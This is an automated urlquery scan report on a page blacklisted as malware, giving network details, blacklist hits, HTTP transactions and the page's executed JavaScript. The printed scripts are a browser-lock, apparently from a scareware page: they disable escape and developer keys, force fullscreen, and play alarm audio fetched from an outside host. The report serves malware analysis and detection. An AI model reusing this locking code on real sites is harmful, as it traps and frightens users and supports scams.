Overview

URL mdkvk.download/fritunes1/
IP37.1.201.66
ASNAS50673 Serverius Holding B.V.
Location Netherlands
Report completed2017-08-04 19:01:50 CEST
StatusLoading report..
urlquery Alerts No alerts detected


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Pool
Access Level


Intrusion Detection Systems

Suricata /w Emerging Threats Pro  No alerts detected


Blacklists

MDL  No alerts detected
OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter
Added / Verified Severity Host Comment
2017-08-04 2 mdkvk.download/fritunes1/ Malware
2017-08-04 2 mdkvk.download/fritunes1/jquery.js Malware
DNS-BH  No alerts detected
mnemonic secure dns  No alerts detected


Recent reports on same IP/ASN/Domain

Last 10 reports on IP: 37.1.201.66

Date UQ / IDS / BL URL IP
2018-06-22 06:22:25 +0200
0 - 1 - 0 mdkmurzilka.accountant/ 37.1.201.66
2018-01-11 20:35:55 +0100
0 - 0 - 1 mdkvk.bid/ 37.1.201.66
2017-12-28 12:49:29 +0100
0 - 0 - 1 mdkbro.loan/ 37.1.201.66
2017-09-11 21:23:27 +0200
0 - 0 - 1 mdkmurzilka.loan/ 37.1.201.66
2017-09-08 22:01:51 +0200
0 - 0 - 1 mdkmurzilka.loan/ 37.1.201.66
2017-09-05 22:16:43 +0200
0 - 0 - 1 mdkmurzilka.racing/ 37.1.201.66
2017-08-25 12:52:32 +0200
0 - 0 - 3 frplnl.loan/deitunes 37.1.201.66
2017-08-25 09:49:00 +0200
0 - 0 - 1 mdkmurzilka.date/deitunes/ 37.1.201.66
2017-08-23 00:29:08 +0200
0 - 0 - 3 mdkmurzilka.review/deitunes 37.1.201.66
2017-08-22 22:29:29 +0200
0 - 0 - 2 mdkmurzilka.party/deitunes/ 37.1.201.66

Last 10 reports on ASN: AS50673 Serverius Holding B.V.

Date UQ / IDS / BL URL IP
2019-05-20 01:25:04 +0200
0 - 4 - 0 morpicert.pw/ 5.45.73.46
2019-05-20 00:58:54 +0200
0 - 0 - 3 informatie-over.nl/ 91.220.37.56
2019-05-20 00:49:27 +0200
0 - 0 - 11 frangipani.be/ 185.56.147.47
2019-05-20 00:49:01 +0200
0 - 0 - 1 7orus.org/ 5.45.71.231
2019-05-19 22:27:21 +0200
0 - 0 - 4 moffia.nl/ 185.116.164.6
2019-05-19 17:19:43 +0200
6 - 1 - 0 https://bivalencelyzlvvjol.xyz/19818/2797/ezn (...) 37.49.225.10
2019-05-19 10:49:22 +0200
0 - 0 - 0 Vipmax-tv.net 185.8.177.130
2019-05-19 10:47:25 +0200
0 - 0 - 0 gomovideo.com 185.8.177.130
2019-05-19 10:45:54 +0200
0 - 0 - 0 185.8.177.130 185.8.177.130
2019-05-19 03:55:22 +0200
0 - 2 - 1 theloadmoon.ltd/raz1.exe 185.14.29.156

No other reports on domain: .



JavaScript

Executed Scripts (18)


Executed Evals (8)

#1 JavaScript::Eval (size: 410, repeated: 1) - SHA256: b8937ed987c41447e7fe794db35c4ecaae8d027b3f9a48fe40689a64311f15e7

                                            window.onkeydown = function(evt) {
        if (evt.keyCode == 27 || evt.keyCode == 18 || evt.keyCode == 123 || evt.keyCode == 85 || evt.keyCode == 9 || evt.keyCode == 115 || evt.keyCode == 116 || evt.keyCode == 112 || evt.keyCode == 114 || evt.keyCode == 17) {
            return false;
        }
    };
    window.onkeypress = function(evn) {
        if (evn.keyCode == 123 || evn.keyCode == 117) return false;
    };
                                    

#2 JavaScript::Eval (size: 323, repeated: 1) - SHA256: f805bd55ffd272422c8e74f0953a6affd88e770e058edc6488db3e747417c626

                                        document.addEventListener('keyup', function(e) {
    if (e.keyCode == 122 || e.keyCode == 17 || e.keyCode == 18 || e.keyCode == 13) {
        toggleFullScreen();
        document.getElementById('sound').innerHTML = "<audio autoplay='autoplay'><source src='http://polariton.ad-l.ink/download/action/8bx2cmRy5/mp3'/></audio>";
    }
}, false);
                                    

#3 JavaScript::Eval (size: 267, repeated: 1) - SHA256: d4697b1ebe7683afd51a70f3354aaea8ed131210563f495298c1d2c1667b7fe0

                                        document.addEventListener('keyup', function(es) {
    if (es.keyCode == 27) {
        toggleFullScreen();
        document.getElementById('sound').innerHTML = "<audio autoplay='autoplay'><source src='http://polariton.ad-l.ink/download/action/8bx2cmRy5/mp3'/></audio>";
    }
}, false);
                                    

#4 JavaScript::Eval (size: 532, repeated: 1) - SHA256: 9b4aa32b6ee8f6da951ff72075972a13e0feedb60f0a95813300dae82c007b13

                                        function getDate() {
    var date = new Date();
    var hours = date.getHours();
    var minutes = date.getMinutes();
    var seconds = date.getSeconds();
    var day = date.getDate();
    var month = date.getMonth() + 1;
    var year = date.getFullYear();
    if (minutes < 10) {
        minutes = '0' + minutes;
    }
    if (seconds < 10) {
        seconds = '0' + seconds;
    }
    document.getElementById('timedisplay').innerHTML = hours + ':' + minutes + ':' + seconds + '<br>' + day + '.' + month + '.' + year;
}
setInterval(getDate, 0);
                                    

#5 JavaScript::Eval (size: 194, repeated: 1) - SHA256: fa7bb2f305a2c599655ebf5a2e8a90ad6d42e1cbafbddd96c6ee82f6e3ccb4fd

                                        function hello() {
    var p = document.getElementById('world');
    if (p.style.display == 'none') {
        p.style.display = 'block';
    } else {
        p.style.display = 'none';
    }
}
                                    

#6 JavaScript::Eval (size: 82, repeated: 1) - SHA256: eaad64e38398ebd625a861d33eb6c215ad5cbfbb9c1733359272d20633292b36

                                        function viewdiv(id) {
    var el = document.getElementById(id);
    el.style.display = "block";
}
                                    

#7 JavaScript::Eval (size: 523, repeated: 1) - SHA256: 50b0a678ce834ba30cb9d84636bf7376c03ce7d0bb2559cb270d657bd630fe0b

                                        if (key == 'jwsf72efuju2') {
    function toggleFullScreen() {
        if (!document.fullscreenElement && !document.mozFullScreenElement && !document.webkitFullscreenElement) {
            if (document.documentElement.requestFullscreen) {
                document.documentElement.requestFullscreen();
            } else if (document.documentElement.mozRequestFullScreen) {
                document.documentElement.mozRequestFullScreen();
            } else if (document.documentElement.webkitRequestFullscreen) {
                document.documentElement.webkitRequestFullscreen(Element.ALLOW_KEYBOARD_INPUT);
            }
        }
    }
}
                                    

#8 JavaScript::Eval (size: 502, repeated: 1) - SHA256: b5410693328b03022bf9114c99cbbc12b9bad402cb5d6d2bc803cea4c01c0607

                                        window.onload = function() {
    document.onclick = function(e) {
        e = e || event;
        target = e.target || e.srcElement;
        toggleFullScreen();
        document.body.style.cursor = 'not-allowed';
        document.getElementById('map').innerHTML = stroka;
        viewdiv('mydiv');
        viewdiv('mypanel');
        document.getElementById('sound').innerHTML = "<audio autoplay='autoplay'><source src='http://polariton.ad-l.ink/download/action/8bx2cmRy5/mp3'/></audio>";
    }
}
                                    

Executed Writes (1)

#1 JavaScript::Write (size: 281, repeated: 1) - SHA256: 9a189437219ed063381407a6a1f214ee9bcad766b6aa1203c9b5cc62987797b8

                                        < a href = '//www.liveinternet.ru/click'
target = _blank > < img src = '//counter.yadro.ru/hit?t52.6;r;s1176*885*24;uhttp%3A//mdkvk.download/fritunes1/;0.18852702683245082'
alt = ''
title = 'LiveInternet: ?>:070=> G8A;> ?@>A<>B@>2 8 ?>A5B8B5;59 70 24 G0A0'
border = '0'
width = '88'
height = '31' > < /a>
                                    


HTTP Transactions (10)


Request Response
                                        
                                            GET /fritunes1/ HTTP/1.1 
Host: mdkvk.download
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         37.1.201.66
HTTP/1.1 200 OK
Content-Type: text/html
                                        
Date: Fri, 04 Aug 2017 17:01:15 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Thu, 03 Aug 2017 08:22:23 GMT
Etag: "dacd-555d5147fb03a"
Accept-Ranges: bytes
Content-Length: 56013
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  UTF-8 Unicode (with BOM) HTML document text, with very long lines, with CRLF line terminators
Size:   56013
Md5:    a9c098564cafcfc41b007485839ac9e6
Sha1:   b58caef436c89a90c41cf91b9b4ccae0a7b6cc3f
Sha256: 185b781d950c4efe607658e086a574401a10cf2156095945362d47b281d91baf

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /jquery-1.7.2.js HTTP/1.1 
Host: code.jquery.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://mdkvk.download/fritunes1/

                                         
                                         94.31.29.54
HTTP/1.1 200 OK
Content-Type: application/javascript; charset=utf-8
                                        
Date: Fri, 04 Aug 2017 17:01:15 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Fri, 24 Oct 2014 00:16:07 GMT
Vary: Accept-Encoding
Etag: W/"54499a47-3dbd1"
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000, public
Access-Control-Allow-Origin: *
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   90283
Md5:    468731fd6a2e4518a37e7b755641c263
Sha1:   a20455e3ea1779efbe2939459569dcfe8c1d96c4
Sha256: 5c4eb28734ecbefdf580a9affcc542f683a2e58a7258ee9ebe2751c2c97a4d57
                                        
                                            GET /extension/ow_miomcti_designs/design/miomcti_public/images/favicon.ico HTTP/1.1 
Host: mdkvk.download
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         37.1.201.66
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=iso-8859-1
                                        
Date: Fri, 04 Aug 2017 17:01:15 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16
Content-Length: 267
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  HTML document text\012 exported SGML document text
Size:   267
Md5:    a03eab71d3861fb15968dfb9e6d5862d
Sha1:   00dfe3b71395396032a31aeab31a9a39aba5ff3f
Sha256: ab376228eff229e46315af3b9e8483730be21c5d951eafb936ddd725e9c61181
                                        
                                            GET /fritunes1/jquery.js HTTP/1.1 
Host: mdkvk.download
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://mdkvk.download/fritunes1/

                                         
                                         37.1.201.66
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Fri, 04 Aug 2017 17:01:15 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Thu, 03 Aug 2017 08:22:23 GMT
Etag: "60ef6-555d5147fb03a"
Accept-Ranges: bytes
Content-Length: 397046
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII English text
Size:   397046
Md5:    f7e1fac3a114fec9741e577a0979768f
Sha1:   39b43426d5647f6a2ca428f5a9faf2b208cc87c5
Sha256: 5e45cd34bfa99e32b3d2ae95fb6acff64b95af728415941bc19ca2d95c699c8b

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /fritunes1/card.png HTTP/1.1 
Host: mdkvk.download
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://mdkvk.download/fritunes1/

                                         
                                         37.1.201.66
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Date: Fri, 04 Aug 2017 17:01:15 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Thu, 03 Aug 2017 08:22:23 GMT
Etag: "d5d2-555d5147fb03a"
Accept-Ranges: bytes
Content-Length: 54738
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  PNG image, 325 x 194, 8-bit/color RGBA, non-interlaced
Size:   54738
Md5:    3d59f06b569819ef0c175bd61f9e3811
Sha1:   988386c3f551e1f04dda9c14c69b6ca4781af7ab
Sha256: 756e729d0091b46a7d684f8a125ed7d4b1d4cd8051f9835d7716b986ee95d048
                                        
                                            GET /fritunes1/alert.jpg HTTP/1.1 
Host: mdkvk.download
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://mdkvk.download/fritunes1/

                                         
                                         37.1.201.66
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Fri, 04 Aug 2017 17:01:16 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Thu, 03 Aug 2017 08:22:23 GMT
Etag: "6987-555d5147fac52"
Accept-Ranges: bytes
Content-Length: 27015
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, EXIF standard
Size:   27015
Md5:    b2e4e13b76af202590a16546138ff72d
Sha1:   241b1be9a9a6b4c37628f470ea2affd34f9b7bcf
Sha256: 98b75e854f782ebb9b1d3c9e8c9de745e9ef2f8087f8fc2f619a8ddb4fdba62a
                                        
                                            GET /hit?t52.6;r;s1176*885*24;uhttp%3A//mdkvk.download/fritunes1/;0.18852702683245082 HTTP/1.1 
Host: counter.yadro.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://mdkvk.download/fritunes1/

                                         
                                         88.212.196.66
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
                                        
Date: Fri, 04 Aug 2017 17:01:16 GMT
Server: 0W/0.8c
Location: http://counter.yadro.ru/hit?q;t52.6;r;s1176*885*24;uhttp%3A//mdkvk.download/fritunes1/;0.18852702683245082
Content-Length: 32
Expires: Wed, 03 Aug 2016 21:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
P3P: policyref="/w3c/p3p.xml", CP="UNI"
Set-Cookie: FTID=1PXAXS2hg0fc1PXAXS005AaM; path=/; expires=Fri, 03 Aug 2018 21:00:00 GMT; domain=.yadro.ru


--- Additional Info ---
Magic:  HTML document text
Size:   32
Md5:    3e9c09a8c5a87f266e047a596f48578c
Sha1:   07d7b1940b7e3f9a3db43197458f9b8ef18a6bce
Sha256: 57fad7ae62012ff4a38ecb6045ac6e8e3a070a33bbd033b21ab6cad3566d9254
                                        
                                            GET /hit?q;t52.6;r;s1176*885*24;uhttp%3A//mdkvk.download/fritunes1/;0.18852702683245082 HTTP/1.1 
Host: counter.yadro.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://mdkvk.download/fritunes1/
Cookie: FTID=1PXAXS2hg0fc1PXAXS005AaM

                                         
                                         88.212.196.66
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Date: Fri, 04 Aug 2017 17:01:16 GMT
Server: 0W/0.8c
Connection: Close
Content-Length: 362
Expires: Wed, 03 Aug 2016 21:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
P3P: policyref="/w3c/p3p.xml", CP="UNI"
Set-Cookie: VID=0AHvJQ2b2Ufc1PXAXS005AbR; path=/; expires=Fri, 03 Aug 2018 21:00:00 GMT; domain=.yadro.ru


--- Additional Info ---
Magic:  GIF image data, version 87a, 88 x 31
Size:   362
Md5:    7b25b20ac31706e7ca86a5ffd09c75d5
Sha1:   830c6230d01396292aa9c76f9579e3fd0ff8d000
Sha256: a73d6739819ba98621e4bdb24bc2fbc2c88583479558b9878e5b986d3b59341d
                                        
                                            GET /extension/ow_miomcti_designs/design/miomcti_public/images/favicon.ico HTTP/1.1 
Host: mdkvk.download
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         37.1.201.66
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=iso-8859-1
                                        
Date: Fri, 04 Aug 2017 17:01:16 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16
Content-Length: 267
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  HTML document text\012 exported SGML document text
Size:   267
Md5:    a03eab71d3861fb15968dfb9e6d5862d
Sha1:   00dfe3b71395396032a31aeab31a9a39aba5ff3f
Sha256: ab376228eff229e46315af3b9e8483730be21c5d951eafb936ddd725e9c61181
                                        
                                            GET /extension/ow_miomcti_designs/design/miomcti_public/images/favicon.ico HTTP/1.1 
Host: mdkvk.download
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         37.1.201.66
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=iso-8859-1
                                        
Date: Fri, 04 Aug 2017 17:01:18 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16
Content-Length: 267
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive


--- Additional Info ---
Magic:  HTML document text\012 exported SGML document text
Size:   267
Md5:    a03eab71d3861fb15968dfb9e6d5862d
Sha1:   00dfe3b71395396032a31aeab31a9a39aba5ff3f
Sha256: ab376228eff229e46315af3b9e8483730be21c5d951eafb936ddd725e9c61181